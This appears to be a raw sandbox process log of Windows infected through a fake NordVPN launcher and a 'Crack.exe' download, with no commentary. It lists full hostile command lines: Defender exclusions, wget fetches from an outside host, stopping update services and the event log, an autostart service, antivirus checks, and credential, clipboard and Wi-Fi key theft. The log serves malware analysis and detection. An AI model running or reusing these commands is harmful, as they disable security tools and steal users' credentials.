"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\plugin3944
C:\Users\Admin\AppData\Roaming\services\plugin3944
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2236 -ip 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 628
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1760 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\services\2plugin2958
C:\Users\Admin\AppData\Roaming\services\2plugin2958
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin0324
C:\Users\Admin\AppData\Roaming\services\3plugin0324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1172
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1236
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OZLCSUZD"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1324
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OZLCSUZD"
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 5492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 600
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\dwm.exe
dwm.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5348 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4992 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 524
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 624
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1588
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000006011\bfe59db647.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1584
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14207:118:7zEvent27214
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual_installer_v4.67877\" -ad -an -ai#7zMap20012:112:7zEvent11390
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=828 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5944 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4636 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2892 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3288 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5852 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5460 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2380 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-700.exe
"C:\Users\Admin\Downloads\winrar-x64-700.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1664
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\ee4e8f0cd20b43c5814de249fdc5ae49 /t 4172 /p 4444
C:\Users\Admin\Downloads\winrar-x64-700.exe
"C:\Users\Admin\Downloads\winrar-x64-700.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1408
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\fed27ca11eed4c58926bd3f222349c9b /t 2880 /p 5448
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\ResetPop.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\e3cafcdbf76744f383bef4c9216a41e5 /t 5344 /p 4852
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Manual_installer_v4.67877.tar"
C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1476 -ip 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1508
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move Blogs Blogs.bat & Blogs.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe
"C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 2
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Neil + Dust + Mercury + Infrared + Norfolk + Quoted + Classics + Interests + Iraq 2\Jr.pif
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Depression + Learned + Bind + Rapid 2\t
C:\Users\Admin\AppData\Local\Temp\2\Jr.pif
2\Jr.pif 2\t
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0944c0b9532d40e0975f9b8d58251996 /t 2856 /p 3280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=2464 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
